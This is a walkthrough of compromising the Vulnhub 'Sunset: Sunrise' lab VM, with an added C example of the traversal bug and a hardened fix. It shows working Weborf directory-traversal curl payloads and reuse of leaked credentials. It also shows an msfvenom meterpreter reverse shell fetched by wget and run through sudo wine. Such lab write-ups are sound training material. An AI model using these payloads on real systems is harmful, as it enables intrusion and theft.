Vulnhub: Detailed walkthrough of the Sunset: Sunrise target machine

Sunrise

Target information

Name: sunset: sunrise

Address:

https://www.vulnhub.com/entry/sunset-sunrise,406/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:fb:2e:ff      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.211  08:00:27:f6:ad:bf      1      60  PCS Systemtechnik GmbH             

Using the netdiscover tool on Kali Linux, the target host's IP address was identified as 192.168.56.211.

Nmap scan

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.211 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-10 00:23 EST
Nmap scan report for bogon (192.168.56.211)
Host is up (0.00016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 37:dd:45:a2:9b:e7:bf:aa:30:e3:f0:96:ac:7c:0b:7c (RSA)
|   256 b4:c2:9b:4d:6f:86:67:02:cf:f6:43:8b:e2:64:ea:04 (ECDSA)
|_  256 cb:f2:e6:cd:e3:e1:0f:bf:ce:e0:a2:3b:84:ae:97:74 (ED25519)
80/tcp   open  http       nginx 1.14.2
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.14.2
3306/tcp open  mysql?
| fingerprint-strings: 
|   Kerberos, NULL, SMBProgNeg, X11Probe: 
|_    Host '192.168.56.146' is not allowed to connect to this MariaDB server
8080/tcp open  http-proxy Weborf (GNU/Linux)
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
|     Content-Length: 202
|     Content-Type: text/html
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   GetRequest: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Content-Length: 326
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
|     </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
|   HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 200
|     Server: Weborf (GNU/Linux)
|     Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|     DAV: 1,2
|     DAV: <http://apache.org/dav/propset/fs/1>
|     MS-Author-Via: DAV
|   Socks5: 
|     HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
|     Content-Length: 199
|     Content-Type: text/html
|_    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-webdav-scan: 
|   Allowed Methods: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
|   WebDAV type: Apache DAV
|_  Server Type: Weborf (GNU/Linux)
|_http-title: Weborf
| http-methods: 
|_  Potentially risky methods: PUT DELETE PROPFIND MKCOL COPY MOVE
|_http-server-header: Weborf (GNU/Linux)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:F6:AD:BF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.63 seconds

The Nmap results show that the target host has four open ports: 22 (ssh), 80 (http), 3306 (mysql) and 8080 (http).

Getting a shell

First, check whether MySQL accepts a weak password:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ mysql -uroot -p -h 192.168.56.211
Enter password: 
ERROR 1130 (HY000): Host '192.168.56.146' is not allowed to connect to this MariaDB server

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ nikto -h http://192.168.56.211    
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.211
+ Target Hostname:    192.168.56.211
+ Target Port:        80
+ Start Time:         2023-03-10 00:40:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.14.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7915 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time:           2023-03-10 00:40:46 (GMT-5) (23 seconds)
---------------------------------------------------------------------------

Combined with the Nmap results, could port 8080 be a proxy server port? (Later note: this assumption turned out to be wrong.)

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ gobuster dir -u http://192.168.56.211 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.211
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              txt,php,html,js,sh
[+] Timeout:                 10s
===============================================================
2023/03/10 00:41:18 Starting gobuster in directory enumeration mode
===============================================================
Progress: 1320369 / 1323366 (99.77%)
===============================================================
2023/03/10 00:45:03 Finished

Visiting port 8080 in a browser, the returned page shows that the target is running Weborf 0.12.2:

Weborf is a lightweight webserver designed to rapidly share directories.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ searchsploit Weborf                 
-------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                              |  Path
-------------------------------------------------------------------------------------------- ---------------------------------
weborf 0.12.2 - Directory Traversal                                                         | linux/remote/14925.txt
Weborf HTTP Server - Denial of Service                                                      | multiple/dos/14012.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ searchsploit -m linux/remote/14925.txt
  Exploit: weborf 0.12.2 - Directory Traversal
      URL: https://www.exploit-db.com/exploits/14925
     Path: /usr/share/exploitdb/exploits/linux/remote/14925.txt
File Type: ASCII text

Copied to: /home/kali/Desktop/Vulnhub/Sunrise/14925.txt


                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ cat 14925.txt                                          
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author: Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
    //Prevents the use of .. to access the whole filesystem  <-- ORLY?
    strReplace(url,"../",'\0');

    replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Out                                                                                                                              
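As an added illustration (not from the original post and not Weborf's own code), the C program below reproduces the ordering bug quoted above, stripping `../` before percent-decoding so that `..%2f` survives, beside a hardened resolver that decodes first and then normalizes the path against the document root. The document root `/srv/www` and all function names are assumptions for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Remove every occurrence of `needle` from `s` in place. Stands in for the
 * strReplace(url, "../", '\0') call quoted from Weborf's instance.c. */
static void strip_all(char *s, const char *needle) {
    size_t n = strlen(needle);
    char *p;
    while ((p = strstr(s, needle)) != NULL)
        memmove(p, p + n, strlen(p + n) + 1);
}

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    c = (char)tolower((unsigned char)c);
    if (c >= 'a' && c <= 'f') return 10 + (c - 'a');
    return -1;
}

/* In-place %XX decoding. Malformed escapes are left untouched. Returns 0 if a
 * %00 was decoded, because an embedded NUL would silently truncate the path. */
static int percent_decode(char *s) {
    char *r = s, *w = s;
    int ok = 1;
    while (*r) {
        int hi, lo;
        if (*r == '%' && (hi = hexval(r[1])) >= 0 && (lo = hexval(r[2])) >= 0) {
            int v = hi * 16 + lo;
            if (v == 0) ok = 0;
            *w++ = (char)v;
            r += 3;
        } else {
            *w++ = *r++;
        }
    }
    *w = '\0';
    return ok;
}

/* Vulnerable ordering, mirroring the quoted modURL(): the ".." filter runs on
 * the still-encoded URL, so "..%2f" is not matched and becomes "../" only
 * after the filter has already run. */
void mod_url_vulnerable(char *url) {
    strip_all(url, "../");
    (void)percent_decode(url);
}

/* Hardened version: decode first, then resolve the path segment by segment
 * and refuse any request that would climb above `root`. Decoding happens
 * exactly once, so a double-encoded "%252e%252e" stays a literal file name.
 * Returns 1 and writes the resolved path to `out` on success, 0 otherwise. */
int resolve_safe(const char *root, const char *url, char *out, size_t outsz) {
    char buf[1024];
    const char *segs[256];
    int depth = 0;
    size_t used;

    if (strlen(url) >= sizeof buf) return 0;
    strcpy(buf, url);
    if (!percent_decode(buf)) return 0;          /* reject %00 truncation */

    for (char *tok = strtok(buf, "/"); tok; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0) continue;
        if (strcmp(tok, "..") == 0) {
            if (depth == 0) return 0;            /* would escape the root */
            depth--;
            continue;
        }
        if (depth == 256) return 0;
        segs[depth++] = tok;
    }

    used = (size_t)snprintf(out, outsz, "%s", root);
    if (used >= outsz) return 0;
    for (int i = 0; i < depth; i++) {
        int n = snprintf(out + used, outsz - used, "/%s", segs[i]);
        if (n < 0 || (size_t)n >= outsz - used) return 0;
        used += (size_t)n;
    }
    return 1;
}

int main(void) {
    char url[128], out[256];
    const char *probe = "/..%2f..%2f..%2fetc%2fpasswd";   /* the request from EDB-14925 */

    strcpy(url, probe);
    mod_url_vulnerable(url);
    printf("vulnerable filter yields: %s\n", url);        /* /../../../etc/passwd */

    printf("hardened resolver: %s\n",
           resolve_safe("/srv/www", probe, out, sizeof out) ? out : "rejected");
    return 0;
}
```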

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ curl http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
uuidd:x:111:120::/run/uuidd:/usr/sbin/nologin
rtkit:x:112:121:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pulse:x:114:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
usbmux:x:115:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
geoclue:x:116:124::/var/lib/geoclue:/usr/sbin/nologin
tss:x:117:125:TPM2 software stack,,,:/var/lib/tpm:/bin/false
speech-dispatcher:x:118:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:120:127:Light Display Manager:/var/lib/lightdm:/bin/false
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false

Usernames obtained: sunrise, weborf

The directory traversal vulnerability allows local files on the target to be read.

Check whether the SSH log can be read: /var/log/auth.log

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ curl http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2flog%2fauth.log   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>      

Check whether the nginx access log can be read:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ curl http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2flog%2fnginx%2faccess.log
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>                                                                                                                              

Next, access the files under /home one by one (access the directory first; the trailing %2f must not be omitted when requesting a directory, otherwise an error is returned):

http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
d	../	-
d	Desktop/	-
d	Documents/	-
d	Downloads/	-
d	Music/	-
d	Pictures/	-
d	Public/	-
d	Templates/	-
d	Videos/	-
f	user.txt	33B


Read the user.txt file:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ curl http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt     
a6050aecf6303b0b824038807d823a89

Visit:

http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fweborf-0.12.2%2f

Try whether .bash_history can be read:

http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2f.bash_history

Try whether .mysql_history can be read:

http://192.168.56.211:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history

The request succeeded and returned:

show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44'; 

This gives a username and password for connecting to the database.

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ mysql -uweborf -p -h 192.168.56.211
Enter password: 
ERROR 1130 (HY000): Host '192.168.56.146' is not allowed to connect to this MariaDB server

However, the database cannot be connected to remotely; it presumably only allows local logins. Could these credentials have been reused for SSH? Try ssh with this username and password:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ ssh weborf@192.168.56.211             
The authenticity of host '192.168.56.211 (192.168.56.211)' can't be established.
ED25519 key fingerprint is SHA256:arxmio0jKR/vILyC/2xCgJuUnoaiHJKIO8GG7ZRhzx8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.211' (ED25519) to the list of known hosts.
weborf@192.168.56.211's password: 
Permission denied, please try again.
weborf@192.168.56.211's password: 
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec  5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$ id
uid=1001(weborf) gid=1001(weborf) groups=1001(weborf)
weborf@sunrise:~$ sudo -l
[sudo] password for weborf: 
Sorry, user weborf may not run sudo on sunrise.
weborf@sunrise:~$ 

weborf@sunrise:~$ mysql -uweborf -p 
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 79
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
3 rows in set (0.022 sec)

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| transaction_registry      |
| user                      |
+---------------------------+
31 rows in set (0.001 sec)

MariaDB [mysql]> select * from user;
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| Host      | User    | Password                                  | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin      | authentication_string                     | password_expired | is_role | default_role | max_statement_time |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| localhost | root    | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | Y          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      | Y                   |          |            |             |              |             0 |           0 |               0 |                    0 | unix_socket | *AF554C323F838EB43A3D464034692C0994346ED8 | N                | N       |              |           0.000000 |
| localhost | sunrise | thefutureissobrightigottawearshades       | N           | N           | N           | N           | N           | N         | N           | N             | N            | N         | N          | N               | N          | N          | N            | N          | N                     | N                | N            | N               | N                | N                | N              | N                   | N                  | N                | N          | N            | N                      | N                   |          |            |             |              |             0 |           0 |               0 |                    0 |             |                                           | N                | N       |              |           0.000000 |
| localhost | weborf  | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 | Y           | Y           | Y           | Y           | Y           | Y         | Y           | Y             | Y            | Y         | N          | Y               | Y          | Y          | Y            | Y          | Y                     | Y                | Y            | Y               | Y                | Y                | Y              | Y                   | Y                  | Y                | Y          | Y            | Y                      | Y                   |          |            |             |              |             0 |           0 |               0 |                    0 |             |                                           | N                | N       |              |           0.000000 |
+-----------+---------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-------------+-------------------------------------------+------------------+---------+--------------+--------------------+
3 rows in set (0.001 sec)

MariaDB [mysql]> 

The password for sunrise was obtained from the database; switch to that user (following the same idea: the database account's credentials are assumed to be reused for the system account).

Privilege escalation

weborf@sunrise:~$ su - sunrise
Password: 
sunrise@sunrise:~$ id
uid=1000(sunrise) gid=1000(sunrise) groups=1000(sunrise),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
sunrise@sunrise:~$ sudo -l
[sudo] password for sunrise: 
Matching Defaults entries for sunrise on sunrise:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunrise may run the following commands on sunrise:
    (root) /usr/bin/wine
sunrise@sunrise:~$ 

wine can run Windows programs, so msfvenom can be used to generate a Windows shell executable, which is uploaded to the target host and then run through wine:

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.146 LPORT=5555 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Sunrise]
└─$ ls
14925.txt  nmap_full_scan  shell.exe

sunrise@sunrise:~$ sudo /usr/bin/wine
Usage: wine PROGRAM [ARGUMENTS...]   Run the specified program
       wine --help                   Display this help and exit
       wine --version                Output version information and exit
sunrise@sunrise:~$ cd /tmp
sunrise@sunrise:/tmp$ wget http://192.168.56.146:8000/shell.exe
--2023-03-10 01:39:44--  http://192.168.56.146:8000/shell.exe
Connecting to 192.168.56.146:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 73802 (72K) [application/x-msdos-program]
Saving to: ‘shell.exe’

shell.exe                       100%[=====================================================>]  72.07K  --.-KB/s    in 0.001s  

2023-03-10 01:39:44 (83.8 MB/s) - ‘shell.exe’ saved [73802/73802]

sunrise@sunrise:/tmp$ sudo /usr/bin/wine shell.exe 
^Csunrise@sunrise:/tmp$ chmod 777 shell.exe 
sunrise@sunrise:/tmp$ sudo /usr/bin/wine shell.exe

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.56.146   yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.146:5555 
[*] Sending stage (175686 bytes) to 192.168.56.211
[*] Meterpreter session 11 opened (192.168.56.146:5555 -> 192.168.56.211:50924) at 2023-03-10 02:11:17 -0500

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
[-] stdapi_sys_process_execute: Operation failed: The system cannot find the file specified.
meterpreter > id
[-] Unknown command: id
meterpreter > sessions 
Usage: sessions <id>

Interact with a different session Id.
This works the same as calling this from the MSF shell: sessions -i <session id>

meterpreter > sessions 11
[*] Session 11 is already interactive.
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
[-] stdapi_sys_process_execute: Operation failed: The system cannot find the file specified.
meterpreter > pwd
Z:\tmp
meterpreter > cd /root
meterpreter > ls
Listing: Z:\root
================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  1602  fil   2019-12-05 17:24:31 -0500  .ICEauthority
100666/rw-rw-rw-  104   fil   2019-12-05 17:40:27 -0500  .Xauthority
100666/rw-rw-rw-  96    fil   2019-12-05 17:54:41 -0500  .bash_history
100666/rw-rw-rw-  570   fil   2010-01-31 06:52:26 -0500  .bashrc
040777/rwxrwxrwx  0     dir   2019-12-04 17:46:24 -0500  .cache
040777/rwxrwxrwx  0     dir   2019-12-04 15:48:21 -0500  .config
100666/rw-rw-rw-  35    fil   2019-12-04 15:46:34 -0500  .dmrc
040777/rwxrwxrwx  0     dir   2019-12-04 15:48:12 -0500  .gnupg
040777/rwxrwxrwx  0     dir   2019-12-04 14:29:33 -0500  .local
040777/rwxrwxrwx  0     dir   2019-12-04 17:46:29 -0500  .mozilla
100666/rw-rw-rw-  0     fil   2019-12-04 16:56:11 -0500  .odbc.ini
100666/rw-rw-rw-  148   fil   2015-08-17 11:30:33 -0400  .profile
040777/rwxrwxrwx  0     dir   2019-12-04 14:48:28 -0500  .rpmdb
100666/rw-rw-rw-  66    fil   2019-12-05 16:08:41 -0500  .selected_editor
040777/rwxrwxrwx  0     dir   2019-12-04 15:47:54 -0500  .ssh
100666/rw-rw-rw-  252   fil   2019-12-05 14:59:00 -0500  .wget-hsts
100666/rw-rw-rw-  2211  fil   2019-12-05 17:24:30 -0500  .xsession-errors
100666/rw-rw-rw-  2211  fil   2019-12-05 13:51:40 -0500  .xsession-errors.old
040777/rwxrwxrwx  0     dir   2019-12-04 15:46:51 -0500  Desktop
040777/rwxrwxrwx  0     dir   2019-12-04 15:46:51 -0500  Documents
040777/rwxrwxrwx  0     dir   2019-12-04 15:46:51 -0500  Downloads
040777/rwxrwxrwx  0     dir   2007-08-29 11:03:27 -0400  Groups
040777/rwxrwxrwx  0     dir   2007-08-29 11:03:27 -0400  Logs
040777/rwxrwxrwx  0     dir   2019-12-04 16:33:15 -0500  Manual
040777/rwxrwxrwx  0     dir   2019-12-04 15:46:51 -0500  Music
040777/rwxrwxrwx  0     dir   2019-12-04 15:46:51 -0500  Pictures
040777/rwxrwxrwx  0     dir   2019-12-04 15:46:51 -0500  Public
040777/rwxrwxrwx  0     dir   2019-12-04 16:33:15 -0500  Readme
040777/rwxrwxrwx  0     dir   2019-12-04 15:46:51 -0500  Templates
040777/rwxrwxrwx  0     dir   2007-08-29 11:03:26 -0400  Users
040777/rwxrwxrwx  0     dir   2019-12-04 15:46:51 -0500  Videos
100666/rw-rw-rw-  701   fil   2019-12-05 17:22:55 -0500  root.txt

meterpreter > cat root.txt
            ^^                   @@@@@@@@@
       ^^       ^^            @@@@@@@@@@@@@@@
                            @@@@@@@@@@@@@@@@@@              ^^
                           @@@@@@@@@@@@@@@@@@@@
 ~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
 ~         ~~   ~  ~       ~~~~~~~~~~~~~~~~~~~~ ~       ~~     ~~ ~
   ~      ~~      ~~ ~~ ~~  ~~~~~~~~~~~~~ ~~~~  ~     ~~~    ~ ~~~  ~ ~~
   ~  ~~     ~         ~      ~~~~~~  ~~ ~~~       ~~ ~ ~~  ~~ ~
 ~  ~       ~ ~      ~           ~~ ~~~~~~  ~      ~~  ~             ~~
       ~             ~        ~      ~      ~~   ~             ~

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

24edb59d21c273c033aa6f1689b0b18c
meterpreter > 

Lessons learned

  1. When the target has a directory traversal vulnerability and /etc/passwd can be read, do not think rigidly and only look for an SSH private key or the nginx and SSH log files; once directory traversal is available, browse the directories one by one and look for relevant files.

